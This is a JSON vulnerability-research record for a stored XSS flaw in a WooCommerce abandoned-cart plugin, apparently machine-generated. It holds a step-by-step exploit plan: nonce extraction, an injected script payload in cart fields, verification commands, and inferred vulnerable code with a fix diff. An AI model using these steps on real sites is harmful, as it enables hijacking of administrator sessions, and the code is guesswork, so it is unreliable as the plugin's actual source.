[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fHgxMUZ5-IBGBKnmkRpHxOx6dDtFMFmtKH7y8PxyH27I":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-32526","abandoned-cart-recovery-for-woocommerce-unauthenticated-stored-cross-site-scripting","Abandoned Cart Recovery for WooCommerce \u003C= 1.1.10 - Unauthenticated Stored Cross-Site Scripting","The Abandoned Cart Recovery for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.1.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","woo-abandoned-cart-recovery",null,"\u003C=1.1.10","1.1.11","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-20 00:00:00","2026-03-26 20:52:07",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F80153f79-0fb0-458b-a39b-c4cd726546f9?source=api-prod",7,[],"researched",false,3,"This research plan focuses on identifying and exploiting a Stored Cross-Site Scripting (XSS) vulnerability in the **Abandoned Cart Recovery for WooCommerce** plugin. Since the vulnerability is unauthenticated, the primary attack surface involves the frontend AJAX handlers used to capture cart data (email, names, etc.) as users interact with the WooCommerce checkout or cart pages.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Stored Cross-Site Scripting (XSS)\n*   **Location:** Frontend AJAX data capture (saving abandoned cart details).\n*   **Cause:** The plugin captures user-provided information (such as names, phone numbers, or email addresses) via AJAX and stores it in the database without sufficient sanitization. Later, when an administrator views the \"Abandoned Carts\" list or details in the WordPress dashboard, this data is rendered without proper output escaping.\n*   **Impact:** An unauthenticated attacker can inject a malicious script that executes in the context of an administrator, potentially leading to session hijacking, creation of new admin accounts, or full site compromise.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Vulnerable Action:** `wp_ajax_nopriv_vi_wacr_save_cart` or `wp_ajax_nopriv_vi_wacr_update_cart` (inferred from typical VillaTheme plugin structures).\n*   **Vulnerable Parameters:** `first_name`, `last_name`, `phone`, or `email`.\n*   **Authentication:** None (unauthenticated).\n*   **Preconditions:** WooCommerce must be active. The plugin must be configured to capture \"Real-time\" abandoned carts (usually enabled by default).\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** An unauthenticated user visits the WooCommerce checkout page.\n2.  **JS Execution:** The plugin's frontend script (`abandoned-cart-recovery-for-woocommerce-public.js`) monitors input fields.\n3.  **AJAX Trigger:** When the user enters data, an AJAX request is sent to `admin-ajax.php` with an action (e.g., `vi_wacr_save_cart`).\n4.  **Storage:** The PHP handler (likely in `includes\u002Ffrontend.php` or `includes\u002Fdata.php`) receives the `POST` data and uses `$wpdb->insert()` or `update_option()` to save it without calling `sanitize_text_field()`.\n5.  **Sink:** The administrator navigates to **WooCommerce > Abandoned Cart**. The plugin fetches the stored data and echoes it into the admin table or modal without using `esc_html()`.\n\n### 4. Nonce Acquisition Strategy\nThe plugin likely uses a nonce to protect its AJAX actions, localized for the frontend.\n\n1.  **Identify Script Localizer:** Look for `wp_localize_script` in the plugin source (likely in `includes\u002Ffrontend.php`).\n    *   *Search Command:* `grep -r \"wp_localize_script\" .`\n2.  **Target Variable:** Identify the object name (e.g., `vi_wacr_frontend_params`) and the nonce key (e.g., `_vi_wacr_nonce`).\n3.  **Extraction Steps:**\n    *   Create a WooCommerce product: `wp post create --post_type=product --post_title='Test Product' --post_status=publish`.\n    *   Navigate to the product page or checkout page using `browser_navigate`.\n    *   Use `browser_eval` to extract the nonce:\n        ```javascript\n        window.vi_wacr_frontend_params?._vi_wacr_nonce || window.vi_wacr_params?.nonce\n        ```\n\n### 5. Exploitation Strategy\nOnce the nonce and action name are confirmed:\n\n**Step 1: Inject Payload**\nSend a `POST` request to `admin-ajax.php`.\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=vi_wacr_save_cart&\n    _vi_wacr_nonce=[EXTRACTED_NONCE]&\n    first_name=\u003Cimg src=x onerror=alert(\"XSS_SUCCESS\")>&\n    last_name=Attacker&\n    email=attacker@example.com&\n    phone=123456789&\n    cart_data=[]\n    ```\n    *(Note: Parameters names like `vi_wacr_first_name` might be used; verify in the source code or by inspecting the checkout page HTML).*\n\n**Step 2: Trigger Execution**\nThe payload is now stored. It will execute when an admin views the abandoned cart list.\n\n### 6. Test Data Setup\n1.  **Install WooCommerce:** Ensure WooCommerce is installed and the setup wizard is bypassed.\n2.  **Create Product:** `wp post create --post_type=product --post_title='Exploit Product' --post_status=publish`.\n3.  **Plugin Configuration:** Ensure \"Capture Abandoned Carts\" is enabled.\n    *   *Check:* `wp option get vi_wacr_params` (or similar option).\n4.  **Add to Cart:** Navigate to the product page and click \"Add to Cart\" to ensure a session is active.\n\n### 7. Expected Results\n*   The `http_request` should return a success status (e.g., `{\"status\":\"success\"}` or `1`).\n*   When the administrator logs in and navigates to the **Abandoned Cart Recovery** menu, the browser should trigger the `alert(\"XSS_SUCCESS\")`.\n\n### 8. Verification Steps\n1.  **Database Check:** Use WP-CLI to confirm the payload is in the database:\n    *   *Command:* `wp db query \"SELECT * FROM wp_wacr_abandoned_cart WHERE first_name LIKE '%\u003Cscript>%'\"` (verify table name via `wp db tables`).\n2.  **Admin View Simulation:** Use `browser_navigate` as an admin to the abandoned cart list page:\n    *   *URL:* `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=vi-abandoned-cart-recovery` (verify slug in `admin_menu` registration).\n    *   Check for the alert or the payload in the DOM.\n\n### 9. Alternative Approaches\n*   **Payload Location:** If `first_name` is sanitized, try `email` or `phone`. Some plugins store the entire `cart_data` object; if the plugin displays product names in the admin and doesn't escape them, you can try injecting XSS into a product title (requires higher privileges) or manipulating the AJAX `cart_data` parameter directly.\n*   **Action Bypassing:** If the nonce check is weak (e.g., `wp_verify_nonce($nonce, -1)`), a nonce from a different action might work.\n*   **Session-based Tracking:** If the plugin requires a specific WooCommerce session cookie, ensure the `http_request` includes the cookies returned from the initial page visit.","The Abandoned Cart Recovery for WooCommerce plugin allows unauthenticated users to inject malicious scripts via frontend AJAX requests that capture cart data. These scripts are stored in the database and execute in the context of an administrator when they view the abandoned cart recovery list in the WordPress dashboard.","\u002F\u002F Inferred from Research Plan: includes\u002Ffrontend.php\npublic function vi_wacr_save_cart() {\n    \u002F\u002F Unsanitized input from POST request\n    $first_name = $_POST['first_name'];\n    $last_name = $_POST['last_name'];\n    $email = $_POST['email'];\n    $phone = $_POST['phone'];\n\n    global $wpdb;\n    $table_name = $wpdb->prefix . 'wacr_abandoned_cart';\n    $wpdb->insert($table_name, array(\n        'first_name' => $first_name,\n        'last_name' => $last_name,\n        'email' => $email,\n        'phone' => $phone,\n        \u002F\u002F ... other fields\n    ));\n}\n\n---\n\n\u002F\u002F Inferred from Research Plan: includes\u002Fadmin\u002Fadmin.php or display logic\nforeach ($abandoned_carts as $cart) {\n    echo '\u003Ctd>' . $cart->first_name . '\u003C\u002Ftd>'; \u002F\u002F Unescaped output\n    echo '\u003Ctd>' . $cart->last_name . '\u003C\u002Ftd>';\n    echo '\u003Ctd>' . $cart->email . '\u003C\u002Ftd>';\n}","--- includes\u002Ffrontend.php\n+++ includes\u002Ffrontend.php\n@@ -10,7 +10,7 @@\n-    $first_name = $_POST['first_name'];\n+    $first_name = sanitize_text_field($_POST['first_name']);\n-    $last_name = $_POST['last_name'];\n+    $last_name = sanitize_text_field($_POST['last_name']);\n-    $email = $_POST['email'];\n+    $email = sanitize_email($_POST['email']);\n-    $phone = $_POST['phone'];\n+    $phone = sanitize_text_field($_POST['phone']);\n\n--- includes\u002Fadmin\u002Fadmin.php\n+++ includes\u002Fadmin\u002Fadmin.php\n@@ -25,5 +25,5 @@\n-    echo '\u003Ctd>' . $cart->first_name . '\u003C\u002Ftd>';\n+    echo '\u003Ctd>' . esc_html($cart->first_name) . '\u003C\u002Ftd>';\n-    echo '\u003Ctd>' . $cart->last_name . '\u003C\u002Ftd>';\n+    echo '\u003Ctd>' . esc_html($cart->last_name) . '\u003C\u002Ftd>';","The exploit targets the plugin's frontend AJAX mechanism for capturing cart data in real-time. 1. An unauthenticated attacker visits the WooCommerce site to retrieve a valid security nonce localized in the frontend JavaScript (usually found in the `vi_wacr_frontend_params` or `vi_wacr_params` objects). 2. The attacker sends a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the action `vi_wacr_save_cart`. 3. The payload contains malicious JavaScript within parameters such as `first_name`, `last_name`, or `phone` (e.g., `\u003Cscript>alert(document.cookie)\u003C\u002Fscript>`). 4. The plugin stores this payload in the database without sanitization. 5. The payload is triggered when an administrator navigates to the 'Abandoned Carts' menu in the WordPress backend, as the stored data is rendered without HTML escaping.","gemini-3-flash-preview","2026-04-18 01:39:34","2026-04-18 01:39:56",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-abandoned-cart-recovery\u002Ftags"]